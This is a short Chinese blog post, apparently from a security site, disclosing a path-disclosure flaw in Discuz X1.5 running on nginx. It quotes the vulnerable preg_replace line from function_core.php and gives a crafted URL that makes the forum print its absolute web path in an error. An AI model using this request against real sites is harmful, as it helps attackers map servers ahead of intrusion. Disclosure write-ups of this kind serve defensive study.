Discuz 1.5暴WEB路径漏洞

分类:安全 | 2011-09-4 | 撸过 49 次
0人扯谈

测试环境:discuz X1.5+nginx 1.0

漏洞文件source/function/function_core.php,

代码:

$_G[‘setting’][‘domain’][‘app’][‘default’] && $content = preg_replace(“/<a href=\”([^\”]+)\”/e”, “rewriteoutput(‘site_default’, 0, ‘”.$_G[‘setting’][‘domain’][‘app’][‘default’].$port.$_G[‘siteroot’].”‘, ‘\\1’)”, $content);

利用代码:

https://www.webshell.cc/forum.php/admin.php’/XXXXXXX.php

就可以在底部看到一个爆出绝对路径的错误了

本站内容均为原创,转载请务必保留署名与链接!
Discuz 1.5暴WEB路径漏洞:https://www.webshell.cc/1137.html
标签:

相关日志